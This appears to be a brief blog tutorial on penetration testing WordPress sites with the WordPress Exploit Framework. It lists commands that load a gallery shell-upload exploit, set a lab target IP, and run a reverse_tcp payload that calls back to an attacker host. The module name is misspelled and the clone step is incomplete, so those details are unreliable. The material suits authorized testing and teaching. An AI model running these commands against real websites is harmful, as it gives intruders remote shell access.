Penetration Testing in WordPress Website using WordPress Exploit Framework

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems

first clone WPXF repository from github, to do so type:

https://github.com/rastating/wordpress-exploit-framework.git

now Open kali linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.

Once loaded, you’ll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/refelex_gallery_shell_upload

wpxf [exploit/ refelex_gallery_shell_upload] > set host 192.168.0.104

wpxf [exploit/ refelex_gallery_shell_upload] > set target_uri /

wpxf [exploit/ refelex_gallery_shell_upload] > set payload reverse_tcp

wpxf [exploit/ refelex_gallery_shell_upload] > set lhost 192.168.0.105

wpxf [exploit/ refelex_gallery_shell_upload] > run

Leave a Reply

Your email address will not be published. Required fields are marked *